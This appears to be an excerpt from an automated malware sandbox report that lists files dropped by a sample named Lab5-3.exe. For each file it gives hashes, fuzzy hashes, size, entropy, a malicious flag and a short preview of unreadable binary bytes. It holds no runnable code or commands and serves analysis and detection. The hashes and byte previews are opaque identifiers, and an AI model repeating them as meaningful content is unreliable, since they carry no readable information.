                                                                                                          SSDEEP:48:lHzd3Oq+6DKDk21EPwqHLbVkNTQhW8XAjHfUTid3hBaUoSGFcmeykEdEElU92i:lTdy64eJrQQc8NGx0uKeY2ElUJ
                                                                                                          MD5:5BC638965A0BCCF7E79E5AAE65D9587E
                                                                                                          SHA1:C0CAFFDA6480C99944CB74C6A8115D9A1D725EAA
                                                                                                          SHA-256:4C3568BA8AE6113E88F32C11953B779C806D515D70E5E1C1E234BFA970700198
                                                                                                          SHA-512:A6B5481C98428CE28AC6E52F7C5CCF72386860A1B85901A2FD33E85416DA5D50C5D089A2D5F99ECDFC8E38C04569660891C06B2543C927DD5A2B6D6304181B5F
                                                                                                          Malicious:false
                                                                                                          Preview:gx..^B..6.|.X.7.9.....7,U.\r)..rT.w9.4.o.E...4...P...Q...^.1}....i.e..I4-.P.-fz..*...r:.z[M.@....+G....n.r..1..Ab.4.M+.p.sR...N..9|....~...bk..........y...v...:....5>.)..K.s.JP...F..XPu...$......l...f..W_..Ssx"@l.!..%...H.....5..m...?9R.@. ..Q....|pc..U....c.v..y7.71)r.......0......d(.i"3.Lg.f._.uZA........*q...K....8.d..j..kD.....43....7j.~ 5.Q!...s.xq6.3Js^..Q..LJ-.k.G;.9.3.O.....X....q....@.6..b......Bx....$...e.G.R.:....6.jm5....<.UU.nc...>.KZ...P.2..(..>...A.L.0..7.:..O*%8?..)...~...<.z..[%xy..i...u... '.^.T...K....Nq4......B........Z.U...e.2.ut=..i..&.-.hG..Zh.,Q..RpH6.f..<...*.Y.....s...k.\m6...o2.B.[o...F$.......z.\..6^...i3.q..j.;...G!..E..E..fJ.6.......V...... ......$=U..5.3..... ....~peP..[b.@.^Xu...@..u........v....x.8....$4.JC....V.l.....(.<..s0w..'.7\...7..2cAF.......N..%.=.nW1d..)..n......~08Cj......%&.S .....uI.L..#/..d.).j..$4...c.....-S....(]Hu.._N...L...5.....F.......A.\..0J4.KKD.&..s#4Pk......_......R.))jN.4...1.m...7.F
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4112
                                                                                                          Entropy (8bit):7.952976589249941
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:+odw4y093+V6anK46+t4srAM6qsZGx0uKeY2ElUJ:zd8St46OKM6hi0Cb
                                                                                                          MD5:68233B8A0D69DDA139D46026B24A75F7
                                                                                                          SHA1:C455D50A2B6A50E1F581D218B819389B30B3F85E
                                                                                                          SHA-256:57C3B790C6100DC2B9947C163DF5E58D38921B80DC724DD5E9E0E80DB3A7731C
                                                                                                          SHA-512:AC2E08286E537EA4E32C828273DAFDA0C706C6C5D2B2C8400506685B3A36114FCEB02C2A80B2D955F410CD32C3185903E598689CBD307A37614DEAA292CE10D1
                                                                                                          Malicious:false
                                                                                                          Preview:..l8.a.,.Mi2..0..].....m.!%...-%=.6...N.>R.9..z.^...[...:....R..b...>.|Vun./.1"l..J.X./..[R..9.......gb...6+f..#..^QT.g.x./f.Xz.......a....H..b.8.v.....R.i,[.C...S.|..m.)7..`.)....>.z.p#t.!T.....7m/.~.e..#}.x.*a..F..nv.T...?.;...#Ar...`.....Q..F..n...,|...7X..4..:.....{.vV.%.....~.S}..(."d/......n....T..*.vr..{N.....op....~.......4...#9~.;+.d9.q.2p5zWz/.8.z....]...3..4...&\U...Xh...q.e..o/....9y$.p-..J.... ..t...G.P,.v..S.&.;....N..9.a..r....R*.0...[.N.....Y9.hk)NK0.p.R2...{....n.\.p.(..f.Mi..}k.....,-."Da).&D.+....m..*.$X{ ....xQ.y@w3..W..@.j.U.W..1.m..+..(.:......T.2(=..i.o4.,.'.*..w....^....".UW...qI.u.G"....=.L..F.o...X.R.NE."Y.P..t.)..V...|M7(K..j.fM,......%..m.Bi..E..!f.I...e...:]...!..Z..H.^......F.+.t.o...E....g...g.....BS.LKo..5(G........Y.....Y.dXA.P.g.Z5..B'.....j......,.D...x.e.@.9._%A....8.....uG,.........:...>..).S.M..(%..}.l.......0u..../xw.0v......G..#~...M...l.P(d...iw.......N.0d.F...w..$.\2lW.Y..U..Bv...0..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2672
                                                                                                          Entropy (8bit):7.915712130297644
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:I+o1vdIDjYQpCVycZoMIYD3BqTDDHfUTid3hBaUoSGFcmeykEdEElU92i:+ufYVyIDBq4Gx0uKeY2ElUJ
                                                                                                          MD5:0CAC4B4EE6F96BD492E1CC670D111410
                                                                                                          SHA1:B426F1086CEB23BAC0F10E9EB84CD133FE887D2C
                                                                                                          SHA-256:2D0C980FD54360CB4A5A38813181AF93A61D86D41884E251F9199AD2B5ACE34C
                                                                                                          SHA-512:614EFB39C43B94ADBED22A4490C0085DC6128C2D41B4C51E5F4CBEE49D774195210280FA05CBED74CA36592768D9D963E5B87808D453D0A39C081969A2F02897
                                                                                                          Malicious:false
                                                                                                          Preview:.._.6|.X4..f6|P..<~.W...^;g&.....9].!...1..Q~.....o....[:...7..6.......(@+.m.r.F..=3....;..MYD..|#.`._..QsV#....3..~..Y2.?\.....#m.T78..t..F.<.puDL.-6..D...h...&..!q..#..9....@.p..J:S.G....u.j.X.."&kT!.j.Ac)_.3o.t....w'_.p..I.....M_!E)..N>..s.".|`W.4I.,o`.m:..'.2%.......7.S..|o.....P..5x.....kA.........<..P..8u.Q....#.....5..^..H58.y%.V.e[VJ...Q.\X...._+.i.==Y..n.......v....L.h.R2{......X..O@v..Z'.?O.H......a.+...........I...As....4...0.DEQ=...{.1i...XCt).$.k^GF..*...}2.;.......Z.M..R.t...r.K.r...U...L.[..d.:.E(...../.j.`)b....f...).....6..fxS...l....._..2oy..2.z!x....f@f....X...%...zW!.c....v.......d)...._..u..)@......fC..>..@s..9..."...'7A......4.m..P..!.&..d._..'X)"...Y...E,.N#72.e-.S.Ot..]2...-.z5;..:f:.KF.....<..s..'i.*.kyOg.".g..,.Q.e..a.Jl..Z.."=..V*.|0..R.."...<.pS...(..h.mu`.._~.[S....F.=..........I......Eh.b.sg..H.........q.1..]e...H.CoI..!..Q..O....b..oNb.UE....$.a..._{{z45[.=._.v..._.Z.w..\q3F..d...W.{.....E..=Or.!.\..uB.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4624
                                                                                                          Entropy (8bit):7.967719029970194
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:V1YdWQrht2JYXWGP6RHe7oTGte4N3XUHr6eWpqtjqGx0uKeY2ElUJ:V18WI2CW86VgW4ZUr6eltN0Cb
                                                                                                          MD5:AFA510841F8EE962242C7972D5743AC9
                                                                                                          SHA1:D925B21B9764070DF6229A2CFB914AADDE376E15
                                                                                                          SHA-256:E970048BE831C285C97F2E1E69846F660594404881E36F9F94424A62E85EDF7A
                                                                                                          SHA-512:5E69FA15A9DD5EAA7160F9481D3AAB72407DCA45D01E609A6F4D39023118068781CC838735DB26BF0461FAC43C8C77578815115DB87B1B4C122A1C5952D5FE06
                                                                                                          Malicious:false
                                                                                                          Preview:(R...-34..F..!.....+..b./i...f..N.......@...........U..b..A..=#....3,.0.. .).r-......!Pa5[.w.,>v.2...Dc...+.....Kt.iz[...y>.L........;h.....KPa...R<...P=...)&...=.+...D..n1.sS..3.~Kjk@..!mS.......W..Y.w?mn...+.d...H.!de.....l}N.....x".w.~.bk.Q.QZ...&Z..<..Td.)8^.a...8%X..7BN.a.(+.......q.i..pU$....Z....%g!72..u.&....G.....0. ...@..S...;.)..2.!..!%...s...n.h...a*..j...L.y..w.B....!.~1.a...V.e...<7.1P.}j...A..)...}......f...9.......[.......+..sE...6|..o.:hC. s......C|...W..?.#......Z^:.jFs8t.......^......5...U....1...g..j#.f?...bTD.S...X"C....Q....=..Gl...%.8...1J..W..t..i..3y:..v...&...E9.n../[:...j.a.3..Iddc........'.\..v.+$..__._.~"..@...h.-...0%w_l.Wr.G..[.;........c..G2.o4.i.w..#.V..c"Q..:W....S....s2o..Ng..].............b. C<.;...;8U....*o..I...OA..L..5N.q_.K.2..-....5.M..-i...-.H?j.?....^.AT.5....X7....O.;..`.gLPq.b...hs=z.\%z..cWi...jw.&.n..2D..y.Ip..".A..=.EE{e:i..ts.N.F.?v....4.=.k."..y..*.4.R....OJ...........^...9~^SY.<
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4624
                                                                                                          Entropy (8bit):7.9623020713167785
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:y72nxAXEmpyZ9F4Pt9buznonJTHZG6Ef4PIGx0uKeY2ElUJ:E2nAEFLFW9yonVZGQj0Cb
                                                                                                          MD5:1DB1842992AD209AA9FDDCA3E8B0BF38
                                                                                                          SHA1:357D79B736C5D4FA944F4FB6BC024A4980426EC8
                                                                                                          SHA-256:80E2258B46658D9A816B9B2921166B7215299288C93EC09C44D21625F47E0EAF
                                                                                                          SHA-512:B028DFE336FC4A10BCF4C321E0E1A6FC7CDA925AA73794A52487907118176399F47801938A1661C72ADE9AF396FE1F48E4FAA442E298F266EA4AC29BB0EA3A84
                                                                                                          Malicious:false
                                                                                                          Preview:X.....Q2...._u.)..`..p....i>......?6....i...O.k..........!...B.5...W.09H..O..C.(a..K.}(...Ch.I`.....w.....Z...>l..N...$.L..b&.5#..TfU....b.._...!)..k]...;L0.X...+..NC.*..H.>...U.!...~.*.....;.T.z[..C.fc.='w.p..g..q.1.#$......w<..`..s...`.`V.t.j8.uE'...A....zA...7...'..+.....=.Xn...$.{v..SK.......K7(........@.-.v.@..L....s?.%Y.[....X$.E.>>BD..[R5.u.......YO...w.R.Y.f.....1......).........$kZu...ws3.....f...D..q..b....s....S..F...w..Z.1{...W&@M*..K.\...........go..rC.S....4@)<F....=..\..n..O.....tB._..c.s..iF.........`!.....aN.).8.........Y$;..`..]...*....M....@j....`-X..z>.........*.....F...E.......;.....4....#.S..$..W..7.v.s....p-....x.1V[=...z.`.M../l.m..7.V..:..M:....3t'..Q............R......|\.?.W^....X.IX..-....nG.....mq...F.%..p..G.j>...lH.[.j......./..)..EP..3.$........_Z..,...+...+<>.j......*!..6........QgHh....,.\..S...~.C..j......s....I.G....b...........+.RP.K....u.,3.\%.U..o|.8.m..:..=K..z^.....H 5.@..7\.l.L2.+'&....|.N.,n..|.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4112
                                                                                                          Entropy (8bit):7.954509219638734
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:3DiCsYkkX/iJvoS640Nsw9OWxGx0uKeY2ElUJ:TakEoS6gWK0Cb
                                                                                                          MD5:13D6D7AB4DD722D41B9CE884B062818C
                                                                                                          SHA1:B239C6F0138BD6773494EF195033444DDB258E1F
                                                                                                          SHA-256:CE246FB1BD3D54948436740619D91F4222550463A8961DB927FB3C3D4AEED4D3
                                                                                                          SHA-512:0574E7C167D0B9C14BC7A7DFCC0B76A61740D9CF7068C434FBD7D60C676F9DDA43C5D3120628C51DEB8E793927426D9C318EEB6581F689A75140D6E59C213988
                                                                                                          Malicious:false
                                                                                                          Preview:..k.7...r...C..U.....Z....]RH.l..lP[..../.f.b......~........CC..XQ=....%.F&....;|.=.8nI..S;...]..../u%.V.;'.fo...3......Ow.3.'..;#...mie.....:..E+$.}.ja0..=....z'....W.Cym.=.....1..N..s.(.l[...~.............I....h..@..f.9....!..oU....O.\...LC.$.7~X2..h3C...reUJ..-..L.OG...2.o.C.....$l.......w>$.{..O}?kE]III....-?.;J..<..$..........G@.5.....p^n.Ge..lc.j...]"..9_e....0.+.`.?!*..io.{...o.....1.;.....X._.).Gm..Q. .Zt..uo..\...I ..8.aJ.h..amg..s..]qk..s.0..-.%m.lx=..,......#.P.'5.o{...h.h...c...../L.8..'.......m..p.uw.m.......3.U&._%h.E...]..I...^n.d..i.. .7~J&..(..|....~.,q.-..RS7...f...I5..U....iZ.(x;>`.n..4........Q.7..;...a.c....7t..U.~.rR..X.....|........kM...s..:....<..{X.=.(.@rt..h...-...+-R...U_^...+.sO.ee... ...4.*.#.....{ma...I@.d~2:..w..G..@.23....`gglA^..ja.C.G.}rKY.0W.p..1L..y]....cze..QRA.:~h..jfA..fA.......P.e.i.E{.,.W7..s....>...q....."".A.....h....h.zK..b.../..E.b...I)..)..U.&.n..y...%VW..Dfg.f...Q.FX{.1.+.r ..&.ur.IK$.b.z`......h..=h.(.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4624
                                                                                                          Entropy (8bit):7.956885153613756
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:zzg2sUee5nU04te+Gi9X23XpkxYipGWX9s56FhGx0uKeY2ElUJ:z02sNe5nUw9sX02J256E0Cb
                                                                                                          MD5:E75DB9C961A2466EA8F946C3DAE1FF58
                                                                                                          SHA1:C4961BE1552888BB7335FBAF802A9D9E51DDD6B8
                                                                                                          SHA-256:6B4A39E7780545F0821D67731A3E327A39E861409FC97C19E697A201E7CDED7D
                                                                                                          SHA-512:44A4DE16309F655F23879F0EDF23B38F2DAFC231FAA5E93622A48F13C507D1AC380292316BA10C4595776E38F5D51D88A140D7E5E5F818A709C6AA9A74CBB597
                                                                                                          Malicious:false
                                                                                                          Preview:. ....K'.}D.`E..HH.l.c..i..@C.'.NF...F=+......q..l?P.M.J..3.....l...x.KM%.{.......[C.F...a..n..z.h. ..s...g[...m..=..r..J.[.k2,e.|..a.lZ!.>........-f.V.....G?...}....mI...n.kAM..d]..+b&[/.b.".MW..m......_.N.U1Z^1.......S..d..8o......(...%......eK.p.yhB.dG<.7.(...=P....FA.y.y..sa..[......D.).....lN1..1.........Ltt.....y..u..~..?).C{zp#t......J6.Y.....v.B....".YqtQ...G@%o..7G.......s-..].8.....X.n.`.QwZZ. ..jc.....B.l._s ..1...e....I.B{.!i..0..eoa..^...{....!..J.).d..!S.V..V.....7.i...&...PB.i>%\.=....@...l.5...7..E...^..Y..v+ni..h...c&..}..W...G.3<....RL..x...6r..4..N%.G*......z.e.P..........S...rA .$D..G..y....=P...v....Y.M...K?..%.1.G..c...t2A5.....-..'..(.9Y...<g.M7.Mm... .."nWJ>.IZ...]...8.c'...E*..U'i...`Ol...v.:.DN'.......g{...|(E.Ld.].......$...j1T.......A.\.2...^a.....F.l..!.na$@....X.h....tX5\^Q.E.Xm3..K<..I..G..7.<...VFU!.-...B.h...8...9...G}?..@wkZm....4.N.46....tT.s..B.=u`..Y... ...,`...l+h.+...^.....Vp5....*.7..t.1.5T.3.$=.S......V.5
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4624
                                                                                                          Entropy (8bit):7.96240167837859
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:BUxzUI2i/El86bIMKvsCtXhgLR/4BGx0uKeY2ElUJ:BUxD/EJbIM0sAx0F0Cb
                                                                                                          MD5:880C8F78788F482B524B2E1A00A44976
                                                                                                          SHA1:48FB44070A699884E1D66EAB2DE18397232C94DB
                                                                                                          SHA-256:63F2DE215AF3C1186CEE5951308C9500248C46EFA240526BF9921673E925F607
                                                                                                          SHA-512:34374EECEED3ECB527D9206BEB0F8F9AB4BEEEF23855F2115AC711AAA00482B39CE3F795038364223FEA1FE1D0F6B9480618AFA4AB357BC390F8C95FB3DCEB36
                                                                                                          Malicious:false
                                                                                                          Preview:.~..,$NZ;......p@...F..2..|u]n.^..|.w..gNd...I...)..Y.:Z..!....SV...r.JLd*Y...q.q..gy#R...;..%xS.9.fN.....N..?.<.<..&.S..2R.+..s.....3._."..y.+.!._...?..~.X).......`....X@H .Y..y...j.....Iz.5O2......Q.y.)^4..|...|./cE..a*.IK.R..7.1.G...o.:d..:.4t...F..H{A......T.$xb..z.y....y]...B.=.I.tN..5...[...[ ...O.. .._Iu(..6#.K-..B...7.. m....VQ..2.5.^.n..5^dq...!.}.....C.n.%@.hpj~..F......s.B.Tt.-....;.S.o..>w..%.....^%v.P._5.H+H@...?9]R..s....A.qj:v2e.2.j...K....M.S.3./...<.....p.S..9n.../.@.p,*.m.[.1.H..m."./..z.o..u....a.T.>..3.-...!.'..X.......c......\..T.b..J...m,8....=b...,jKM[.....P."...u.F.F.]b........\._..,...oY.zR...\,.. ..Rpi....F.$..,..".....L6.i3.o...;.f"%....$A.;......T...2?6.W.....g..b.e....=.4..D/.....Q..%Ng.&..BG<F}...%....C.X..[..._0..N]d3G....4.5.......w.Y...l.8dl..g..!..U........H@.B\._....*4..u.J. H..........N.+.~p..f...u.)..Fh.Q.`.u..d<X.wB.G..?.^F...>.t.z/..w.a.vX.X)B1.UV&VtU....g.C.D...#.......uN7.x.u..!..X...Pk........."..!.(Z.).X.......F
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4624
                                                                                                          Entropy (8bit):7.962727098655989
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:SBAf1y/sHkD42JlMsY97t3ESBDziV66Gx0uKeY2ElUJ:SGf1na4ySR7tUSEV6p0Cb
                                                                                                          MD5:1382328864C46071FA4FBCA58F73841D
                                                                                                          SHA1:C355AF48C628A7A17C34A688B562DC4C709CB0AC
                                                                                                          SHA-256:83F7B16044EA0A888E90B897F24D5074ED2BD5AA283A74EE1B14913E7834C947
                                                                                                          SHA-512:E4664E28BEB8634F67F199ACE20860FA827B1B1FB94941407FB22710838E3C722B1EF332DD6743C755C948197B8548CA0B16BF02D462C6F9CF81F9357930ACF0
                                                                                                          Malicious:false
                                                                                                          Preview:..u..K.Q.b|<A.........Tk...T.l......&a.VV....[.g..fA....}WW.D^d......Hb&.ZU}I.+.......p.*...i..G].....6.*...b...G...F/.2".j....;.TM..U.....N.T..O.h...d..!N.7.....d.^...O.q.O#Cr....[.h.w...nB.....Im&..O..G..D.....:.....7.#.......]..o%p....ay ..'......q.F.|`#..V...]....N..iq..Y...h.E(4~.....M.N.N..~..%..GX.Y......k....*hP.5.JFAn..XoW.....O<.+F..-..<....6....D.).*..I.CC.%....b..R...."..(.r&.p...2...u..`...(.I..|...dG(...TL..M jp...d~..>.....B.N .....OL.[m....G.{.....+;..{d]...!..k.s..D..'..sS.=~..e[....ub$...._..2.=K.Z.vv..=.A.c..G..&.W.E-..cFJ..+.}..6......8.-;jhM..Q..s..s.'.5S....U..!.3.U....3.Xs4...;...F...|>...2V..V2.........+..F....:.e6\|.3W*.}....f....ds.-...s..)M..]..........R....a.a.....!Hm.......};..R.3.u.<..B$.v.b.l..`C.,en/C.Z@...$..1...*....D]P..)#2..J..p&&........~...a..........R'..........y.W.i..w....* v.f.tL.r.@Py.2.....U.44.h.q.R7..c....~}H..Ij....BF<.<..../T...@9.....u..~:.....6..Z_..ig.&....l^E\rg
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4624
                                                                                                          Entropy (8bit):7.962893348145538
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:btaENXVpLDm9bRRETQpZ7QjguaAmsL9Gx0uKeY2ElUJ:bsEVdm9bRF77QjJosLG0Cb
                                                                                                          MD5:C29A70CB46ADC5543CC4F0CEED586CEA
                                                                                                          SHA1:573374D4D2A613FAEB4BA4E0FD4A5180CB70FE5C
                                                                                                          SHA-256:AC588592FAE2C3AA2706615385449A740F001E0AFA7169C8D64D0402C7556CE2
                                                                                                          SHA-512:7A89484BEB8735C0CA7052BAE40E3E3B45B98F5B3040EAB899DA263855909170A4197A055B7195E70345B19F44563959182E220AEE832591AC80BA99401035CF
                                                                                                          Malicious:false
                                                                                                          Preview:..*|I.*.Ehc..y..R.6.E.Q<..L....I....-..fm...........GY........nO...I....{.8 ..].M.=.......A5.9.>L=.a.2.....jv..uzi....1..{.eN.....A...jOW...J.._..V..2t....pd.}n...S...T........p...u8D......f...yy...Nf..T..:.!1[....vC~P...M.D...".C.-....^"...u.....5QBw..u)."..$.I *?w...qhG..\..G%..:._%..z.\oS.....*........z.(...0..x.N..M.[:gui6N....b.{A...vM3..c.z.....vA.....pG..P.U........XM.......F.i9....m.lU.. <.'.Hx_.....;....fJ.`N......t......E ~\dI..;.q....&.E...,A..6.....d+..=.Bu.x.kY!.Uq.!......mqSR..B...l.%+.7....R.0...B.ApA|e. ...Lc_....9...'.c...,oqj.%..%..)8'..A:b...U..q..A..?f..d.....V..wm..w.......I.....Z...D.+..%....lB)... .....L..F..3..B.s.....vB...0..Nr.3..]2...>.....Ef..a-.2.?.uI._........H@...zP.W._....i...5e...[*pJ..(].+k.d).{e..No..2.y.[begZ.+t..o......M..^.@.wPm*.w._..../....x!.C<..jc".T.$.KU...m._..~.j...."...+.r ..J1;....i9..).....!`#..e.9....2..;......n.L"..A..~8....."...~.{.7..Jj....8D.p...k.7.V....u.}0s%....!..W`...).....v...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1904
                                                                                                          Entropy (8bit):7.912013051790848
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:nTNj8MChyxNHfUTid3hBaUoSGFcmeykEdEElU92i:n6MChy0Gx0uKeY2ElUJ
                                                                                                          MD5:693C14EE6456F1CC8F420B842BE7B30A
                                                                                                          SHA1:E0E131692226ECDE97E7D1DC3FA5766EB28198CD
                                                                                                          SHA-256:5D3A9C9B096B02C3EE7BFF43854B8206A7FA2EFDF0BCCDA5DB9E880968131F29
                                                                                                          SHA-512:CB112139A5B8DA04882AF97BAA377837398224E7B0BC5CA1CB910D1F9E2A77DFE1C8CC89BC2463EE26F590C4E1F20869640BF0EECF9A81DE5A0957D9B0800A23
                                                                                                          Malicious:false
                                                                                                          Preview:}.&..6.C...h.[au'.P(>e..yA...Nf#`......@..]6...E+....._S.].......3.aZ..a.\0..o..}.uG.._./i&L....LY.>(BV..2.6..'.?..+.E....)$k....!.,..2..k.`.h...g.G.....lsxNb......h.."4...@.yE.....kk.z.b..I.....J...BJG`.'l3.'.M..>.%y..S..H....R...x3GI...XN..I.......u:..w...........v.j.{....Y..f..zS...i..+.w.f.^5.:.R......c.Q...fG..."....4...I.k.....F.4.a:..&.Ay.e.[u$..D.7.sS.. &K;U...-.j..].&........6._..5.oLT.LGf,.Va].s/...xl...m.-...=.R..u4T......j;...x..J}.....x.....`...qu.}..99....X..ro..?...hc.,*....]...~{.DGe.....MSB]...=SD.4^.|...Je.........>..,..`..4...g@..w.\.....(.P/rB.z.66p.w!4.......^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9216
                                                                                                          Entropy (8bit):7.980043762619788
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:acJkPtl0j8mc43CuIVA1weUNX6OeAlmcKaO0Cb:1JkPJWCuIOoK1jbaOtb
                                                                                                          MD5:3A30943FDF3A6C5C596D8F157031E968
                                                                                                          SHA1:1E9588C1D8D450D2CA9978A50F95257B379718ED
                                                                                                          SHA-256:54C475E5E27878B1971A67F1732BCE553A26E2C56E5BAB0118CB69982E72AAE0
                                                                                                          SHA-512:ADC6C4558D536174F36978AB65C4625CA6338BB6C0BB303FAA6311B70832D1A6A7E574054283D86031F3AB5DA04DC9926CFAB8915CF3CB178B76C99B242A951D
                                                                                                          Malicious:false
                                                                                                          Preview:...P.-!.xzz...nh-mz8..*.rp...o...@.Yz}%.E..a....iH.....b..A.Q..<.b......C..f.......O.As.5...9..gW....jU.....3....X-........>q.....UH.....c.3.6.V.....).O.C.,2.X....w...kr5...n...;.'.................w9W"s..^*......v.d...A.PA4......._Lg.F..."......RH...>..5.H0......*..:_..h...d.R,qci../<.@...)f.9.75m..(l.1..J...`h"=.............;1....q....neV......`.7~..J]....c.F..g.":(.+..#..U..nl.7........>..Y......5..U..C..%X.wuK._.I.W..=.....2.B...jvu..XG.b..G..._}R....[.`..X..........).l....m.....5..S..%?f..'..~......0sXW".!...:.GW........ ..u...#.<....Q`.S.\k...*.S.......i..h...n...[.P)h.........vlF...gn...0.|.<.2[P.mC..%]|..%....\..?....I.....M.?..Ru.t......!.R"..j....J..LkId.\.G.;RM.*.)L6......e7....0Fy^R....[...[.(...`1....Ur.Q...b.$...zU$#|5hWHq..~.KS.,.....0~......L*z..j.c..:..j.V=%......X..|.%..xj..0I .3......../.AQ2%.........McQe.N.(.....ACgajsU.tF0.Z..;...zP..A?.I.....0. >.5P.. *.}.@g~.C..+_..:mQ.b..A..u..b....4g2.;-LO...NQ.}...<.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12592
                                                                                                          Entropy (8bit):7.986536992253262
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:SLtCoWuZ9SmIwFe/mrp9nWuIHpZbu53CUQXINTVvTlH4VaqlJQzcCPkeKg0Cb:wtb7S6Y4cHpc5OINTVvpHSlOPMe/tb
                                                                                                          MD5:A30F68B52FD63BCD2BD2D49C9E622176
                                                                                                          SHA1:3DDC8AF4E35E8578044C53AED6F2400347DB3F5F
                                                                                                          SHA-256:92CE9F4D155FDA298746F24E6BEFC76F6C24B9CD7E902C381147278E64AEC535
                                                                                                          SHA-512:8E8D5CBAE00A59B06168BC51746706F7179BF8E61B2FE4D28026321336F68C415409157D2E37FFE2A4985CA0ECBA9DB92BA3411D789011B7D8D13CFB5AC9A932
                                                                                                          Malicious:false
                                                                                                          Preview:.c0.s.z.HU......,...n.....*I.1....0.......$g......4.1..k.p..j....RE"..;U"h..g........>e.Uv...../-.;*...y.aK..m!.P.5. S3).?...........L.nD.!d..C..4t8+.....L.....1....N.#G.2..*.).A..'..S'...K.e....s;.,{IB.\k.LP.....4(. .nY....3.B.:..%....c.<.L...{.. .....<....MP....X!e%.X....h.T!X..f%.....n..]..../Lg(...t?M..t.8....o.w&./)...$..Np.....NY..,.(A.cI..N.].].l.#JO.`.*Rc.)....."<....|`..F.>....5^JaC2....I.>!.1w...h.qcr#.A.+.GXFn....uo%..^y..\...y(...N.:*.P...<...M..fT}.......r.{."8..x.g(...6.m8o;......9...O|.]7D..;A2.CK.V.~........C>R,B.Q.c...66..,.k..w.%dL.N....g...@OW....U..L...?&p?..X...<f..~....Do..w.'...."m}f...y.........QBa...@H.-..o7....[...R@..u.G..8....]....A.[..v`]^.k..~.g.y3.h%#c...4.<eF..l./$(.KO.BF..l..Z.....JBz7.....1.L...\.....2.j.tE...Vx..../...EQ'....jR....X.5I.W....V..&.b..D.(.R....Y.{........P..a?).V.........U.b. ..t`..f..w@`...<&.a....oN.=O.>.dG,..+..T........E.+B..L..l...b.L..\.......<.fN..J..G.....ml#{...i..2..._y..9.v
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):98608
                                                                                                          Entropy (8bit):7.997788566582561
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:ZqCGm9pC6e8JzLf1Ac/GmvCWCuK9r05FQlItVZ:+cC6e8JomBCuKwTZ
                                                                                                          MD5:B21B4EF1E16EDA4ECBE7FBC47E82A788
                                                                                                          SHA1:70A0547BAC6894A96720E719A67D756E5984E2DE
                                                                                                          SHA-256:E4B739EA6FCBB69708364BFC322543E3A9604FB9D1DD833A9ED0CF54A23AD1D7
                                                                                                          SHA-512:2FCA59D92110477A441B8CA243F18B1148A5DDDC1A120E1F77D4F269F4D14CF475CDD90D864FF113DC8D797A42AE5D2FB96DBF4CE6C5D74779185FEF0D57500E
                                                                                                          Malicious:true
